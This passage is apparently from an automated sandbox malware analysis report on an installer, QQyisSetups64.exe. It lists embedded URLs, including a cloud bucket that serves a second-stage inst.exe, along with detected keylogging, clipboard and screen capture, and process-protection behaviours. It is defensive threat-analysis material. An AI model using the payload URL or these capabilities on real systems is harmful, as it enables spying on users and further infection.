Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: sites.dll.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: sites.dll.15.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0a
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://sf.symcd.com0&
Source: inst.exe	String found in binary or memory: http://sfdw.360safe.com/safesetup_2000.exe
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://sfdw.360safe.com/safesetup_2000.exe360
Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://sfdw.360safe.com/setup.exe.exe
Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://sfdw.360safe.com/setupbeta.exe4(u7b4N
Source: inst.exe	String found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cab
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh
Source: inst.exe	String found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_ce61817f687d599de13ee9deb1af83e2_5.1.0.1181.cab
Source: sites.dll.15.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://sv.symcd.com0&
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: inst.exe	String found in binary or memory: http://wpad.%s/wpad.dat
Source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://wpad.%s/wpad.dathttp://%s/wpad.datwpad
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://www.360.cn
Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://www.360.cn/
Source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://www.360.cn//index.html127.0.0.1--
Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://www.360.cn/xukexieyi.html#360
Source: powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: powershell.exe, 0000000C.00000002.1427177445.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C12000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1456369398.0000000000400000.00000040.00000001.01000000.00000004.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C9F000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000006.00000002.2556409168.000000000019D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe.
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exea
Source: QQyisSetups64.exe, 00000003.00000002.1456312362.000000000019A000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1456369398.0000000000400000.00000040.00000001.01000000.00000004.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000006.00000002.2556409168.000000000019D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exep
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeq
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/l
Source: inst.exe	String found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.html
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.htmlD
Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: qmgr.db.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000012.00000003.1512607145.000002945EFB0000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.1427177445.0000000005363000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: inst.exe	String found in binary or memory: https://hao.360.cn
Source: inst.exe	String found in binary or memory: https://hao.360.cn/
Source: inst.exe	String found in binary or memory: https://hao.360.cn/?installer
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s
Source: inst.exe, 0000000F.00000002.2559394305.000000000081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.18.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: QQyisSetups64.exe, 00000003.00000002.1461469475.000000000363B000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, 360P2SP.dll.15.dr, inst[1].exe.3.dr, sites.dll.15.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: sites.dll.15.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: https://www.incredibuild.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown

HTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.7:49708 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: [esc]	6_2_0378E850
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: [esc]	6_2_0378E850
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: [esc]	6_2_0378E850
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: [esc]	6_2_0378E850

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_0378E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,

6_2_0378E850

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

6_2_0378E850

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_0378BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,

6_2_0378BC70

Source: C:\Users\user\Downloads\inst.exe

Code function: 15_2_6C60F664 GetAsyncKeyState,

15_2_6C60F664

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_0378E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,

6_2_0378E4F0

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

Jump to behavior

Source: C:\Users\user\Downloads\inst.exe

Code function: 15_2_6C633544 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,IntersectRect,IntersectRect,

15_2_6C633544

Source: Yara match	File source: QQyisSetups64.exe, type: SAMPLE
Source: Yara match	File source: 3.0.QQyisSetups64.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1279423862.00000000006F9000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QQyisSetups64.exe PID: 7736, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, type: DROPPED

E-Banking Fraud

Checks if browser processes are running

Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW, Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads		15_2_00AC8A46
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW, Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads		16_2_00AC8A46

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Process information set: 01 00 00 00

Jump to behavior

Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_02861A37 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,		3_2_02861A37
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_02861087 NtdllDefWindowProc_W,		3_2_02861087

Source: C:\Users\user\Downloads\inst.exe

Code function: 15_2_00AE42DE: __EH_prolog3,GetDriveTypeW,_memset,QueryDosDeviceW,_wcslen,__wcsnicmp,CreateFileW,DeviceIoControl,CloseHandle,CloseHandle,

15_2_00AE42DE

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0378B463 ExitWindowsEx,	6_2_0378B463
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0378B43F ExitWindowsEx,	6_2_0378B43F
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0378B41B ExitWindowsEx,	6_2_0378B41B

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_10010F10	3_2_10010F10
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_02860032	3_2_02860032
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_02870EE7	3_2_02870EE7
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03786EE0	6_2_03786EE0
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03786C50	6_2_03786C50
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0379E341	6_2_0379E341
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03798381	6_2_03798381
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0379EA1D	6_2_0379EA1D
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03788900	6_2_03788900
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0379F9FF	6_2_0379F9FF
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0379D89F	6_2_0379D89F
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0379DDF0	6_2_0379DDF0
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_037824B0	6_2_037824B0
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C9122F	6_2_02C9122F
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C91E5C	6_2_02C91E5C
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C8B66A	6_2_02C8B66A
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C91780	6_2_02C91780
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C90CDE	6_2_02C90CDE
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C824B0	6_2_02C824B0
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C92D91	6_2_02C92D91
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02880032	6_2_02880032
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02891206	6_2_02891206
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0288B641	6_2_0288B641
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02891757	6_2_02891757
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02882487	6_2_02882487
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02890CB5	6_2_02890CB5
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02892D68	6_2_02892D68
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0361F3BE	6_2_0361F3BE
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0361D25E	6_2_0361D25E
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_036082BF	6_2_036082BF
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0360689F	6_2_0360689F
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0361D7AF	6_2_0361D7AF
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03601E6F	6_2_03601E6F
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0360660F	6_2_0360660F
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03617D40	6_2_03617D40
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0361DD00	6_2_0361DD00
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AA9245	15_2_00AA9245
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AC592D	15_2_00AC592D
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00ACE945	15_2_00ACE945
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AFC8E0	15_2_00AFC8E0
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A90F04	15_2_00A90F04
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A91281	15_2_00A91281
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A82960	15_2_00A82960
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A7AA00	15_2_00A7AA00
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AAAB33	15_2_00AAAB33
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A730C0	15_2_00A730C0
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A771F0	15_2_00A771F0
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AE729C	15_2_00AE729C
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A774F0	15_2_00A774F0
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00B039CB	15_2_00B039CB
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AF3970	15_2_00AF3970
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A7FF00	15_2_00A7FF00
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A7FF70	15_2_00A7FF70
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C6AACAF	15_2_6C6AACAF
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C69E994	15_2_6C69E994
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C68EBC4	15_2_6C68EBC4
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C69E45E	15_2_6C69E45E
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C6AA5B7	15_2_6C6AA5B7
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C6A266A	15_2_6C6A266A
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C66BD52	15_2_6C66BD52
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C67F9F9	15_2_6C67F9F9
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C697BC3	15_2_6C697BC3
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C633B87	15_2_6C633B87
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C673787	15_2_6C673787
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C6A8E51	15_2_6C6A8E51
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C5D4880	15_2_6C5D4880
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C680A6E	15_2_6C680A6E
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C5D4B40	15_2_6C5D4B40
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C6A0B58	15_2_6C6A0B58
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AFC8E0	16_2_00AFC8E0
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A82960	16_2_00A82960
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A7AA00	16_2_00A7AA00
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AAAB33	16_2_00AAAB33
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A90F04	16_2_00A90F04
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A730C0	16_2_00A730C0
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A7B050	16_2_00A7B050
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A771F0	16_2_00A771F0
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A91281	16_2_00A91281
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AE729C	16_2_00AE729C
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AA9245	16_2_00AA9245
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A774F0	16_2_00A774F0
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00B039CB	16_2_00B039CB
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AC592D	16_2_00AC592D
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AF3970	16_2_00AF3970
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A7FF00	16_2_00A7FF00
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A7FF70	16_2_00A7FF70

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\inst[1].exe B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
